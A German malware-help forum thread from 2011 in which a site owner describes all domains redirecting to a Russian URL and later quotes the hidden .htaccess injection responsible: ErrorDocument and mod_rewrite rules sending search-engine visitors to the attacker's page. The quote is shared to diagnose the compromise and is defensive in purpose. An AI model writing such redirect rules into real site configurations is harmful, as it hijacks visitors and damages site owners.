Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Meine Domain wird umgeleitet

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 13.10.2011, 23:11   #1
wilang
 
Meine Domain wird umgeleitet - Standard

Meine Domain wird umgeleitet



Hallo Leute,
ich weiss nicht mal, ob ich hier richtig bin, da es sich um ein Serverproblem handelt. Beim Suchen im Forum habe ich leider auch nichts passendes gefunden.

Also zum Problem:
* Ich habe bei meinem Provider ein Account, auf dem ich 5 verschiede Domais liegen habe.
* seit gestern werden alle Domains auf http|||actris|ru|change|ndex|php
umgeleitet
* ich habe umgehend mit meinem Provider Kontakt aufgenommen, die haben mir eine Mail geschrieben, dass das erst genauer Analysiert wird
und mir wurde die nachstehnde Vorgangsweise empfohlen.

* ich habe in der Zwischenzeit alle Passwörter geändert
* Alles was auf dem Server stand auf den PC heruntergeladen und mit McAfee überprüft, angeblich alles OK
* zusätzlich habe ich auf dem Server alles gelöscht, nicht angezeigte files sind nicht vorhanden
* alle Ordner, auf die die Domains zeigen neu aufgesetz - sind jetzt alle leer
bis auf eine ebenfalls neue index.html (schreibt nur 'Sorry')
* trotzdem wird noch immer umgeleitet

* habe jetzt in einen ordner mit einem .htaccess geschützt
* beim aufruf der Domain wird das Passwort abgefragt, aber dann wieder umgeleitet
* ein zusätziches redirect auf eine andere Domain wird ebenfalls ignoriert

sollte ich bei euch an der falsche Adresse sein, dann bitte einen Hinweis wo ich mich klüger machen kann

achja eine der eine der domais ist www|blindenuss|at .
aber bitte vorsicht, ich weiss nicht was man sich dort einfängt.

danke für die Hlfe

wilang

Alt 17.10.2011, 14:19   #2
wilang
 
Meine Domain wird umgeleitet - Standard

Meine Domain wird umgeleitet



Hallo Leute,

die Malware ist gefunden.

Hier die Beschreibung, wo sich die Freunde eingenistet hatten.
in der obersten .htaccess (CHMOD 644) , die bei mir vom Provider eingerichte wurde
wurde relativ weit unten ( man musste sehr weit nach unten scrollen )
dieser Eintrag gefunden:
ErrorDocument 400 http:**actris.ru*change*ndex.php usw. alle Errordocumente
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR] usw. alle Suchmaschinen
RewriteRule ^(.*)$ http:**actris.ru*change*ndex.php [R=301,L]

lG
wilang
__________________


Geändert von wilang (17.10.2011 um 14:28 Uhr)

Antwort

Themen zu Meine Domain wird umgeleitet
access, account, adresse, angeblich, angezeigte, aufruf, ebenfalls, falsche, files, forum, gelöscht, hinweis, kontakt, leute, mail, mcafee, neu, neue, nichts, ordner, passwort, passwörter, redirect, serverproblem, suche, umgeleitet




Ähnliche Themen: Meine Domain wird umgeleitet


  1. Browser wird auf Seiten mit Werbung umgeleitet
    Plagegeister aller Art und deren Bekämpfung - 03.01.2015 (15)
  2. Domain wird als Spam missbraucht
    Überwachung, Datenschutz und Spam - 08.10.2013 (5)
  3. Google-Suche wird umgeleitet
    Log-Analyse und Auswertung - 11.08.2013 (15)
  4. Onlinebanking wird umgeleitet
    Log-Analyse und Auswertung - 28.07.2013 (18)
  5. Domain wird umgeleitet
    Plagegeister aller Art und deren Bekämpfung - 20.08.2012 (9)
  6. Win 7, IE, Google Suche wird umgeleitet
    Plagegeister aller Art und deren Bekämpfung - 06.04.2012 (19)
  7. Pishing - Bankseite wird umgeleitet
    Plagegeister aller Art und deren Bekämpfung - 31.08.2011 (17)
  8. Datentransfer wird möglicherweise umgeleitet
    Log-Analyse und Auswertung - 05.06.2011 (16)
  9. google suche wird Umgeleitet
    Log-Analyse und Auswertung - 30.04.2011 (1)
  10. Werde immer auf www.adtech.de/home umgeleitet statt auf meine Startseite!
    Plagegeister aller Art und deren Bekämpfung - 04.01.2011 (1)
  11. google wird auf komische seiten umgeleitet
    Log-Analyse und Auswertung - 28.05.2010 (3)
  12. Werden meine Daten umgeleitet?
    Log-Analyse und Auswertung - 02.03.2009 (3)
  13. Googlesuche wird woanders umgeleitet
    Log-Analyse und Auswertung - 20.02.2009 (0)
  14. url wird umgeleitet
    Log-Analyse und Auswertung - 20.11.2008 (0)
  15. Google wird umgeleitet
    Log-Analyse und Auswertung - 03.03.2006 (4)
  16. Mein Firefox wird als umgeleitet
    Log-Analyse und Auswertung - 09.11.2005 (4)
  17. IE wird umgeleitet- ( about blank)
    Log-Analyse und Auswertung - 06.01.2005 (2)

Zum Thema Meine Domain wird umgeleitet - Hallo Leute, ich weiss nicht mal, ob ich hier richtig bin, da es sich um ein Serverproblem handelt. Beim Suchen im Forum habe ich leider auch nichts passendes gefunden. Also - Meine Domain wird umgeleitet...
Archiv
Du betrachtest: Meine Domain wird umgeleitet auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.